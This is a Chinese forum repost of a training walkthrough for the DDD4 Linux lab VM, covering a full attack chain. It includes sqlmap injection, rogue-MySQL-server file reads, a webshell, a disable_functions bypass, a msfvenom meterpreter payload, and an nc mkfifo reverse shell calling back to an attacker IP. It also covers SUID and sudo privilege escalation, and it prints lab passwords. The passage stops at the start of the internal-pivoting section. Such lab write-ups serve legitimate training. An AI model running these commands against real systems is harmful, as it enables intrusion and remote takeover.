linux 内网完整渗透测试靶机实例-外链论坛

j8typz 发表于 2024-10-3 16:53:53

linux 内网完整渗透测试靶机实例

本篇文案是暗月供给的内部培训的内容！感觉体系比较完善，因此就发出来给大众了。
文末 有pdf版本位置

<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8nKT4LQEvUQfDvJIY09D1t6Spiak54ohTO1TVOKSaSqEdyse9OBj3zdQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8vIyGKWQANFIG6FbfDVnaBzF8Jf23e7icrZeTMLxOG2hNGrdbwO5G3DA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
1. DDD4 靶场介绍
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机，本靶场需要把网络环境配置好。
1.1.网络示意图
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8DcMYic0v0QjYgZKG3EbQj58kFtms607wbczGhwCSiclANjUcEaPNjdkg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2. 信息收集
2.1.主机发掘sudo netdiscover -i eth0 -r 192.168.0.0/24
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8d52WYphpXGOUjf0TUK8XB0QrzU92bTveLgy61UHTphhBsUJ94dQrFg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2.2.nmap 主机发掘nmap -sn 192.168.0.0/24
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf894icAMic3iae0wZf91pWKHwbibZ9QHz4zjPakYsqUKUP5z9E9n15DO7uIA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2.3.masscan 端口探测sudo masscan -p 1-65535 192.168.0.122 --rate=1000
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf89JNOwqTeN14KXMyica9jYKLfODUk7p61e3szxZsDHocqA8amAYicAvQA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2.4.nmap 端口信息获取kali@kali:~/ddd4$ nmap -sC -p 8888,3306,888,21,80 -A 192.168.0.122 -oA ddd4-port Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 01:41 EDTNmap scan report for 192.168.0.122 Host is up (0.0038s latency).PORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd | ssl-cert: Subject:commonName=116.27.229.43/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN | Not valid before: 2020-04-09T18:40:16 |_Not valid after: 2030-01-07T18:40:16 |_ssl-date: TLS randomness does not represent time80/tcp open http Apache httpd | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache |_http-title:\xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9888/tcp open http Apache httpd | http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache |_http-title: 403 Forbidden 3306/tcp open mysql MySQL 5.6.47-log | mysql-info: | Protocol: 10 | Version: 5.6.47-log | Thread ID: 72| Capabilities flags: 63487 | Some Capabilities: DontAllowDatabaseTableColumn, Support41Auth,Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, LongPassword,IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient,SupportsLoadDataLocal, ConnectWithDatabase, SupportsCompression, FoundRows,LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments,SupportsAuthPlugins | Status: Autocommit | Salt: ~4%\!-_vU`2soS06\NR|_ Auth Plugin Name: mysql_native_password 8888/tcp open http Ajenti http control panel | http-robots.txt: 1 disallowed entry |_/ | http-title:\xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5|_Requested resource was http://192.168.0.122:8888/login |_http-trane-info: Problem with XML parsing of /evox/about Service Info: Host: 0b842aa5.phpmyadminService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.76 seconds
2.5.绑定 hosts
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8gDJAqbNG7FslXI4owDUxicwibPMibuHUYQNW9nO7oqNlAooN7ohoukoVg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2.6.gobuser 的高级用法
利用gobuser扫描可用信息gobuster dir -u http://www.ddd4.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,zip,html,rar -o ddd4.log --wildcard -l | grep -v 10430 | grep -v "Size: 49"
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8F3F2gib1ep2HBbETrF7lzUQt3WwGWZK4WWqT7DRUnYLyarjuYC6GUlg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">/contact (Status: 200) /products (Status: 200) /search (Status: 200) /partners (Status: 200) ......
3. 对目的进行渗透测试
 结合前期的工作，而后经过手工判断 发掘存在SQL注入等漏洞
3.1.SQLMAP 编码注入漏洞利用sqlmap -u http://www.ddd4.com/search?keyword=11 --tamper chardoubleencode.py -v 1 --batch -p keyword
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf85GtT3EaMlff8UpyGbkFRIImGeThNrX6iaPiawMxe5NeCcCkh5xrTqOrQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">sqlmap -u http://www.ddd4.com/search?keyword=11 --tamper chardoubleencode.py -v 1 --batch -p keyword -D www_ddd4_com --dump -T doc_user
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf83LYNficQyibLD3F3kjZNG0Jd6yJUsTtNpaYE1AuhzCmx59PRmtrj17TQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
得到秘码字符串33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
未知加密方式，没法解密
3.2.MYSQL 服务器恶意读取客户端文件漏洞利用
从网上下来一套源码。发掘问题
setup\setup.php<?php$dbhost = $_REQUEST; $uname = $_REQUEST;$pwd = $_REQUEST; $dbname = $_REQUEST; if($_GET=="chkdb"){$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){die(-1);}$rs = mysql_query(show databases;); while($row = mysql_fetch_assoc($rs)){ $data[] = $row;}unset($rs, $row); mysql_close();if (in_array(strtolower($dbname), $data)){ echo 1;}else{echo 0;}}elseif($_GET=="creatdb"){ if(!$dbname){die(0);}$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){die(-1);}if (mysql_query("CREATE DATABASE {$dbname} DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci",$con)){echo "1"; }else{echo mysql_error();}mysql_close($con);}exit;?>$dbhost = $_REQUEST;$uname = $_REQUEST;$pwd = $_REQUEST;$dbname = $_REQUEST;if($_GET=="chkdb"){$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){die(-1);}
这个能够连接远程的 mysql 因此能够利用 mysql 的 bug 能够读取文件。
3.3.Rogue-MySql-Server 读取文件
利用工具项目位置：https://github.com/allyshka/Rogue-MySql-Server
编辑rogue_mysql_server.py文件
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf867mibLOpIMPawJUV6z1aicwXjSd2icUZoovuXXfouY4XeLiaE2KaickD1Cg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
拜访连接http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=192.168.0.109&action=chkdb
能够获取到报错路径
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8MQdgRKXG55yjbhVnWRiaFuLibpiceWSbrmmibglF3Ec7wthwQtibZYuubKg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
经过工具执行后咱们读取本地的mysql.log文件
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8w2h4X5o4IqTiaAL8fWhfokoyXCTlsPlZC2pibICUgUX7OrIv0582yZ4w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
 成功获取到了/etc/passwd
3.4.Rogue-MySql-Server 读取配置文件
经过获取到了网站路径以及下载的源码得到配置文件路径为
/www/wwwroot/www.ddd4.com/config/doc-config-cn.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8XeibS1O2eibPf92G8QM6e42xqYiaJ0M2jWJo6sMHcL9xE7F33ntzLppFw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
经过获取信息得到了数据库配置文件信息dbname www_ddd4_comusername www_ddd4_com password x4ix6ZrM7b8nFYHn
3.5.登录 mysqlmysql -h192.168.0.122 -uwww_ddd4_com -px4ix6ZrM7b8nFYHn
<img src="https://mmbiz.qpic.cn/mmbiz_png/shVkAyu04IGibDaibjhkcztYa4YibLGMXf8Th9ib56Bia7dFM9kTIPnJajWoXGskXcNu8BdaKP54Vntmf8EFkhIFdbQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
3.6.后台密文登录
由于密文不可直接破解，只能经过update方式 替换为咱们自己生成的密文以便登录
经过代码

<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
得到 admin 的密文为33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
先要读取原来密文，而后再update 登录成功后方便update回去
原密文
33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
利用mysql执行update语句MySQL > update doc_user set pwd=33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0 where id=1;Query OK, 1 row affected (0.005 sec)Rows matched: 1 Changed: 1 Warnings: 0
成功登录后台
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
3.7.后台上传漏洞
看到代码文件
admini\controllers\system\bakup.phpfunction uploadsql(){global $request; $uploadfile=basename($_FILES); if($_FILES>$request)echo <script>alert(" 您上传的文件超出了 2M 的限制!");window.history.go(-1);</script>;if(fileext($uploadfile)!=sql)echo <script>alert(" 只允许上传 sql 格式文件!");window.history.go(-1);</script>;$savepath = ABSPATH./temp/data/.$uploadfile;if(move_uploaded_file($_FILES, $savepath)){echo <script>alert(" 数据库 SQL 脚本文件上传成功!");window.history.go(-1);</script>;}else{echo <script>alert(" 数据库 SQL 脚本文件上传失败!");window.history.go(-1);</script>;}}
存在规律问题上传 SQL 判断无退出 引起可上传任何文件
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
上传后发掘没法执行，发掘是由于.htaccess重写了 url 禁止有些目录拜访。
3.8.模板编辑拿webshell
发掘后台存在模板编辑功能
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
能够直接编辑php文件，经过该功能直接获取webshell
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4. linux 特权提高
4.1.突破 disable_functions提权
该目的运用的是新版宝塔系统
这套新系统的宝塔系统 php 禁止非常多函数的执行 passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_w aitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pc ntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get _last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exe c,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
不外还是漏了有些函数，引起能够执行。http://www.ddd4.com/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/xx&sopath =/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
尝试反弹失败
4.2.metasploit 反弹 shell
4.2.1.生成攻击载荷sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=13777 -f elf >ddd4
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.2.2.监听端口msfconsole 打开 metasploitmsf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set LHOST 192.168.0.109 LHOST => 192.168.0.109msf5 exploit(multi/handler) > set lport 13777 lport => 13777msf5 exploit(multi/handler) > exploit
4.2.3.成功监听 shell
将文件上传到添加执行权限，在目录执行就可 http://www.ddd4.com/bypass_disablefunc.php?cmd=chmod%20777%20ddd4&outpath= /tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.sohttp://www.ddd4.com/bypass_disablefunc.php?cmd=./ddd4&outpath=/tmp/xx&sopath= /www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
切换 shell
 python -c import pty;pty.spawn("/bin/bash")
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.3.创立交互 shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 9001 >/tmp/fnc -lvnp 9001python -c import pty;pty.spawn("/bin/bash")
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.4.查看用户www@host123:/www/wwwroot/www.ddd4.com$ cat /etc/passwd | grep bash cat /etc/passwd | grep bashroot:x:0:0:root:/root:/bin/bashhost123:x:1000:1000:host123,,,:/home/host123:/bin/bash www@host123:/www/wwwroot/www.ddd4.com$
4.5.获取第1个 flag.txt
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.6.经过宝塔提权到 root
经过命令查看发掘host123 桌面存在文件 bt.txt。该文件保留着宝塔信息www@host123:/www/wwwroot/www.ddd4.com$ cat /home/host123/bt.txt cat /home/host123/bt.txtBt-Panel: http://116.27.229.43:8888/944906b5 username: gpeqnjf4password: d12924fawww@host123:/www/wwwroot/www.ddd4.com$
最新版本的宝塔是有linux 终端的。不外需要输入命令并记录秘码才可行，因此运用该办法提权反弹
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
成功反弹回root权限
4.7.经过 suid 提权到 root
除了宝塔这点提权呢 还能够会用suid提权find / -type f -perm -u=s 2>/dev/null
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
存在 find 带有 s 能够用于提权find test -exec whoami \;
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.8.linux 三大信息收集脚本的运用和解释
4.8.1.LinEnum 的运用
   这个脚本是用来收集系统的信息如特殊文件的权限 suid 文件信息网络端口信息 创立 WEB 服务器sudo python -m SimpleHTTPServer 80
下载文件执行 wget http://192.168.0.109/LinEnum.sh
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
历史记录找到 root 秘码 yanisy123
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.8.2.linux-exploit-suggester.的运用
这个用来检测是不是存在提权 cve 漏洞
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.8.3.linuxprivchecker.py
这个用来检测权限python linuxprivchecker.py
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.9.sudo 提权
sudo -l host123 用户能够执行命令
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
4.10. 第二个 flag
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5. linux 内网跨网段渗透
5.1.获取高权限的 meterpreter
先用 metasploit 反弹一个 root 权限的 meterpretermsf5 exploit(multi/handler) > exploit -j
放在后台执行
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
